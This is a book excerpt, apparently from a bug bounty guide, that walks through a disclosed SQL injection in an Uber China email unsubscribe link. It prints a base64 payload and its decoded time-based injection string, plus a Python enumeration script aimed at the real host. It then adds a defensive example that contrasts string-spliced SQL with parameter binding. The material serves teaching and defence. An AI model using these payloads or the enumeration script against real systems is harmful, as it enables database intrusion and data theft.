Bug Bounty Hunting Essentials

Uber SQL injection

  • Title: SQL injection on sctrack.email.uber.com.cn.
  • Reported by: Orange.
  • Bounty Rewarded: $4,000.
  • Web application URL: http://sctrack.email.uber.com.cn.
  • Description: Uber is a famous ride-hailing service; it is one of the biggest in the world and is used in a number of cities around the world by people who want to move from one place to another. The reporter in this case, Orange Tsai, a famous bug bounty hunter, traveled to China and called an Uber. Uber sends marketing emails to riders based on their location; now, like any rider, the first thing he did was to unsubscribe from that email. Bug bounty hunters have keen eyes, though: Orange observed that the unsubscribe link he received in China was different from the one he received in normal circumstances. Reviewing the original report, the URL looked something like this: http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==.

The p parameter carries an encoded string that is sent to the backend server once the link is visited. The value of p is base64-encoded text, and in the original report it carried a time-based SQL command. Decoding it shows that the parameter contains two fields: user_id, which identifies the user, and receiver, which is the receiving email address. Orange identified that he could incorporate a time-based SQL string in the user_id field, which looks something like this:

{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"} 

So the sleep(12) call delays the response by 12 seconds, which shows that the injected SQL is being executed by the database. This is what we call the hello world of proofs of concept. From there on, Orange created a script with which he could enumerate the database name and current user. A snippet from the script is as follows:

import json
import string
from base64 import b64encode
from urllib.parse import quote

import requests

# Candidate characters for each position of the value being guessed
base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}

for l in range(0, 30):
    for i in 'i' + base:
        # Ask whether character l+1 of user() equals i; the rest of the query is commented out with #
        payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#" % (l + 1, i)
        new_payload = json.dumps(payload)
        # JSON, then base64, matching the format of the unsubscribe link
        new_payload = b64encode(new_payload.encode()).decode()
        r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=' + quote(new_payload))

The script crafts a time-based payload for each character guess and sends an HTTP request to the target server; from the responses it recovers the current user and the database name, as follows:

sendcloud_w@10.9.79.210 
sendcloud
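To see the defect from the defender's side, here is an added example (not code from the book, from Orange's report, or from Uber's backend, whose real schema and query are unknown and assumed here). It decodes the p token the way the backend evidently did, first with the decoded user_id spliced into the SQL string, then in a hardened form that requires a JSON integer user_id and binds both fields as query parameters. The subscribers table and the tokens are constructed; sqlite3 stands in for the real database, so MySQL functions such as sleep() and mid() are unavailable and a plain boolean condition is used to show the same effect. PAGE_TOKEN is the p value quoted in the report above.

```python
import base64
import json
import sqlite3

# The p value quoted in the report above; it decodes to the JSON shown on the page.
PAGE_TOKEN = "eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ=="


def make_db():
    """Constructed stand-in for the mailing backend (assumption: the real schema is unknown).
    sqlite3 is used so the example runs anywhere; MySQL's sleep()/mid() do not exist here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscribers (user_id INTEGER PRIMARY KEY, receiver TEXT)")
    conn.executemany("INSERT INTO subscribers VALUES (?, ?)",
                     [(5755, "orange@mymail"), (5756, "someone@example.invalid")])
    conn.commit()
    return conn


def make_token(user_id, receiver):
    """Build a p value the same way the unsubscribe link does: JSON, then base64."""
    body = json.dumps({"user_id": user_id, "receiver": receiver})
    return base64.b64encode(body.encode()).decode()


def decode_token(p):
    """Reverse make_token. Base64 is an encoding, not authentication: anyone can forge p."""
    return json.loads(base64.b64decode(p).decode())


def unsubscribe_vulnerable(conn, p):
    """Splices both decoded fields straight into SQL, the pattern the report exploited.
    A string user_id such as "5755 and 1=0" rewrites the WHERE clause, so the token
    can ask the database yes/no questions (or, on MySQL, make it sleep())."""
    data = decode_token(p)
    sql = "SELECT receiver FROM subscribers WHERE user_id = %s AND receiver = '%s'" % (
        data["user_id"], data["receiver"])
    return [row[0] for row in conn.execute(sql)]


def unsubscribe_hardened(conn, p):
    """Type-checks the decoded fields and binds them as parameters, so the token's
    contents can no longer change the structure of the query."""
    data = decode_token(p)
    user_id = data.get("user_id")
    receiver = data.get("receiver")
    # JSON true/false arrive as Python bool, which is a subclass of int: exclude it explicitly.
    if isinstance(user_id, bool) or not isinstance(user_id, int):
        raise ValueError("user_id must be a JSON integer")
    if not isinstance(receiver, str) or len(receiver) > 254:
        raise ValueError("receiver must be a string of sane length")
    rows = conn.execute(
        "SELECT receiver FROM subscribers WHERE user_id = ? AND receiver = ?",
        (user_id, receiver)).fetchall()
    return [row[0] for row in rows]


def rejected(conn, p):
    """True when the hardened handler refuses the token; useful as a log/alert signal."""
    try:
        unsubscribe_hardened(conn, p)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(decode_token(PAGE_TOKEN))
    legit = make_token(5755, "orange@mymail")
    print(unsubscribe_vulnerable(db, legit), unsubscribe_hardened(db, legit))
    # Boolean inference: the injected condition flips the result, which is what the
    # character-by-character script in the report relied on.
    print(unsubscribe_vulnerable(db, make_token("5755 and 1=1", "orange@mymail")))
    print(unsubscribe_vulnerable(db, make_token("5755 and 1=0", "orange@mymail")))
    print(rejected(db, PAGE_TOKEN))
```

The type check matters as much as the parameter binding: the legitimate link carries user_id as a JSON number, so a token in which it arrives as a string is malformed by construction and can be rejected and logged before any query runs.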